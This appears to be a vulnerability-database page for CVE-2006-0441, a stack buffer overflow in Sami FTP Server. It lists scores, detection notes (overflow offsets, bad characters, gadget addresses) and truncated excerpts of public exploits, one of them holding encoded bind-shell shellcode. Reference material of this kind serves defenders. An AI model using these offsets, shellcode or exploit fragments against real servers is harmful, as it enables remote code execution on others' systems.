CVE-2006-0441
published 2006-01-26CVE-2006-0441: Stack-based buffer overflow in Sami FTP Server 2.0.1 allows remote attackers to execute arbitrary code via a long USER command, which triggers the overflow…
PriorityP356high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
70.42%
99.3th percentile
Stack-based buffer overflow in Sami FTP Server 2.0.1 allows remote attackers to execute arbitrary code via a long USER command, which triggers the overflow when the log is viewed.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| karjasoft | sami_ftp_server | — | — |
| karjasoft | sami_ftp_server | — | — |
| karjasoft | sami_ftp_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →The overflow is triggered when the FTP server administrator views the log GUI — the exploit is passive/deferred, not immediate. Detection should focus on oversized USER/PASS commands written to the log file rather than immediate crash. ↗
- →Payload persists across restarts via the binary log file SamiFTP.binlog; shellcode re-executes on every server restart until the log file is manually deleted. ↗
- →Overflow offset is at 596 bytes in the USER field; SEH overwrite occurs at 600 bytes. Alert on FTP USER or PASS commands exceeding ~596 bytes. ↗
- →Bad characters for payload encoding are null byte, CR, LF, space, and 0xFF — any FTP USER/PASS payload avoiding these bytes but exceeding 596 bytes is suspicious. ↗
- →Banner check: server responds with 'Sami FTP Server 2.0.2' — use this banner string to identify vulnerable instances during network scanning. ↗
- →The SEH-based exploit uses a pop/pop/ret gadget in tmp01.dll at 0x10022ADE; presence of this module loaded in the Sami FTP process space indicates a vulnerable configuration. ↗
- ·Return addresses are OS/SP/locale specific; the listed ROP gadgets target ws2help.dll on Windows 2000 (EN/IT/FR) and Windows XP SP0/1 EN only — they will not work on other platforms without adjustment. ↗
- ·Payload space is limited to 300 bytes with a stack adjustment of -3500 in the Metasploit module; larger staged payloads may not fit without modification. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-x3r2-p3h2-85wm: Buffer overflow in KarjaSoft Sami FTP Server 2
ghsa_unreviewed·2022-05-14·CVSS 7.5
CVE-2008-5106 [HIGH] CWE-119 GHSA-x3r2-p3h2-85wm: Buffer overflow in KarjaSoft Sami FTP Server 2
Buffer overflow in KarjaSoft Sami FTP Server 2.0.x allows remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via a long argument to an arbitrary command, which triggers the overflow when the SamyFtp.binlog log file is viewed in the management console. NOTE: this may overlap CVE-2006-0441 and CVE-2006-2212.
GHSA
GHSA-92cm-crm8-frm2: Stack-based buffer overflow in Sami FTP Server 2
ghsa_unreviewed·2022-05-01
CVE-2006-0441 [HIGH] GHSA-92cm-crm8-frm2: Stack-based buffer overflow in Sami FTP Server 2
Stack-based buffer overflow in Sami FTP Server 2.0.1 allows remote attackers to execute arbitrary code via a long USER command, which triggers the overflow when the log is viewed.
No detection rules found.
Exploit-DB
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
exploitdb·2016-11-01
CVE-2006-0441 KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)
---
#/usr/bin/python
#-*- Coding: utf-8 -*-
### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ###
# Date: 2016-01-11
# Exploit Author: n30m1nd
# Vendor Homepage: http://www.karjasoft.com/
# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
# Version: 2.0.2
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Thanks to PHRACK for maintaining all the articles up for so much time...
# These are priceless and still current for exploit development!!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Open Sami FTP Server and open its graphical interface
# * Run this python script and write
Exploit-DB
KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2006-2212 KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)
KarjaSoft Sami FTP Server 2.0.2 - USER Remote Buffer Overflow (Metasploit)
---
##
# $Id: sami_ftpd_user.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'KarjaSoft Sami FTP Server v2.02 USER Overflow',
'Description' => %q{
This module exploits the KarjaSoft Sami FTP Server version 2.02
by sending an excessively long USER string. The stack is overwritten
when the administrator attempts to view the FTP logs. Therefore, this exploit
is passive and requires end-user interaction. Keep this in mind when selecti
Exploit-DB
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow
exploitdb·2007-01-17
CVE-2006-0441 KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow
---
#!/usr/bin/perl
# Exploit for SAMI FTP version 2.0.2
# USER/PASS BUFFER OVERFLOW ARBITARY REMOTE CODE EXECUTION (CALC.exe)
# You can put you own shellcode to spawn a shell
# Thrusday 17th Jan 2007
# Tested on : Windows 2000 SP4 (Use your own return address for other flavors)
#
#
#
# Coded by UmZ! [email protected]
# On behalf of : Secure Bytes Inc.
# http://www.secure-bytes.com/exploits/
#
#
#
# Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali
#
#
# Disclaimer: This Proof of concept exploit is for educational purpose only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
#
#
# Note: After executing the exploit You will get "Ca
Exploit-DB
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)
exploitdb·2007-01-14
CVE-2006-0441 KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (PoC)
---
/************************************************************************
*KarjaSoft Sami FTP Server 2.0.2 USER/PASS buffer overflow *
* *
*Sending a long USER / PASS request to server triggers the vulnerability*
*EAX and EDX are owned leading to code execution *
*This is only a POC *
*Thanks to rewterz and Muhammad Ahmed Siddiqui for discovery *
* *
*Usage: sami.exe ip port *
* *
*Coded by Marsu *
************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
struct hostent *he;
struct sockaddr_in sock_addr;
WSADATA wsa;
int ftpsock;
char recvbuff[1024];
char evilbuff[1
Exploit-DB
KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)
exploitdb·2006-01-31
CVE-2006-0441 KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)
KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)
---
// Two includes.
#include
#include
// Project - Settings - Link > Object/Library modules 'Ws2_32.lib'
#pragma comment(lib, "ws2_32")
char MyShellCode[] = // XOR by \x99\x99\x99\x99.
"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"
"\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777.
"\xF4\x71\xA1\x99\x99\x99\xDA\xD4\xDD\x99"
"\x7E\xE0\x5F\xE0\x7C\xD0\x1F\xD0\x3D\x34\xB7\x70\x3D\x83\xE9\x5E"
"\x40\x90\x6C\x34\x52\x74\x65\xA2\x17\xD7\x97\x75\xE7\x41\x7B\xEA"
"\x34\x40\x9C\x57\xEB\x67\x2A\x8F\xCE\xCA\xAB\xC6\xAA\xAB\xB7\xDD"
"\xD5\xD5\x99\x98\xC2\xCD\x10\x7C\x10\xC4\x99\xF3\xA9\xC0\xFD\x12"
"\x98\x12\xD9\x95\x12\xE9\x85\x34\x12\xC1\x91\x72\x95\x14\xCE\xB5"
"\xC8\xCB\x66\x49\x10\x5A\xC0\x72\x89\xF3\x91\xC
Exploit-DB
KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)
exploitdb·2006-01-25
CVE-2006-0441 KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)
KarjaSoft Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)
---
##
# Written by redsand
#
# This is simple, look for a {call,jmp} esp
##
package Msf::Exploit::pmsoftware_samftpd;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'PMSoftware Samftpd Remote Exploit',
'Version' => '$Revision: 1.0 $',
'Authors' => [ '', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'USER' => [1, 'DATA', 'Username', 'redsand0wnedj00'],
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x20",
'Keys' => ['+ws2ord'],
# 'Prepend' => "\x81\xc4\xff\xef\
Exploit-DB
KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow
exploitdb·2006-01-25
CVE-2006-0441 KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow
KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow
---
#!/usr/bin/perl
# Sami FTP Server v2.0.1 Remote notepad.exe execution PoC by Critical Security research http://www.critical.lt
# Tested on Windows XP SP2, Windows XP SP0 and even on FreeBSD 6.0-RELEASE Wine 0.9.6 :))
use Net::FTP; # new($host, Debug => 0) or die "Cannot connect: $@";
$user = "A" x 213 . # vaþiuojam iki returno :O (cia irgi galima kiðt ðelkodà :) )
"A" x (15 - $c) . # dar keli baitai sulyginimui, nes á stekà taip pat ásiraðo ir ip adresas, todël reikia pagal já paskaièiuot, kur raðyt ret adresà
$offset . # ret adresas á kokio dll'o call esp ar jmp esp, ar ka nors panaðaus svarbu, kad nuðoktume á esp ;)
"\x90" x 25 . # nop'ø sled'as, kad sulygintume su esp esanèiu adresu
# ðelkodas paleidþiantis notepadà
Metasploit
KarjaSoft Sami FTP Server v2.0.2 USER Overflow
metasploit
KarjaSoft Sami FTP Server v2.0.2 USER Overflow
KarjaSoft Sami FTP Server v2.0.2 USER Overflow
This module exploits an unauthenticated stack buffer overflow in KarjaSoft Sami FTP Server version 2.0.2 by sending an overly long USER string during login. The payload is triggered when the administrator opens the application GUI. If the GUI window is open at the time of exploitation, the payload will be executed immediately. Keep this in mind when selecting payloads. The application will crash following execution of the payload and will not restart automatically. When the application is restarted, it will re-execute the payload unless the payload has been manually removed from the SamiFTP.binlog log file. This module has been tested successfully on Sami FTP Server versions: 2.0.2 on Windows XP SP0 (x86); 2.0.2 on Windows 7 SP1 (x86); 2.0.2
No writeups or analysis indexed.
http://downloads.securityfocus.com/vulnerabilities/exploits/sami_ftp_poc.plhttp://secunia.com/advisories/18574http://www.critical.lt/?vulnerabilities/208http://www.karjasoft.com/samiftp/newshttp://www.securityfocus.com/archive/1/423148/100/0/threadedhttp://www.securityfocus.com/bid/16370http://www.vupen.com/english/advisories/2006/0317https://exchange.xforce.ibmcloud.com/vulnerabilities/24325https://www.exploit-db.com/exploits/40675/http://downloads.securityfocus.com/vulnerabilities/exploits/sami_ftp_poc.plhttp://secunia.com/advisories/18574http://www.critical.lt/?vulnerabilities/208http://www.karjasoft.com/samiftp/newshttp://www.securityfocus.com/archive/1/423148/100/0/threadedhttp://www.securityfocus.com/bid/16370http://www.vupen.com/english/advisories/2006/0317https://exchange.xforce.ibmcloud.com/vulnerabilities/24325https://www.exploit-db.com/exploits/40675/
2006-01-26
Published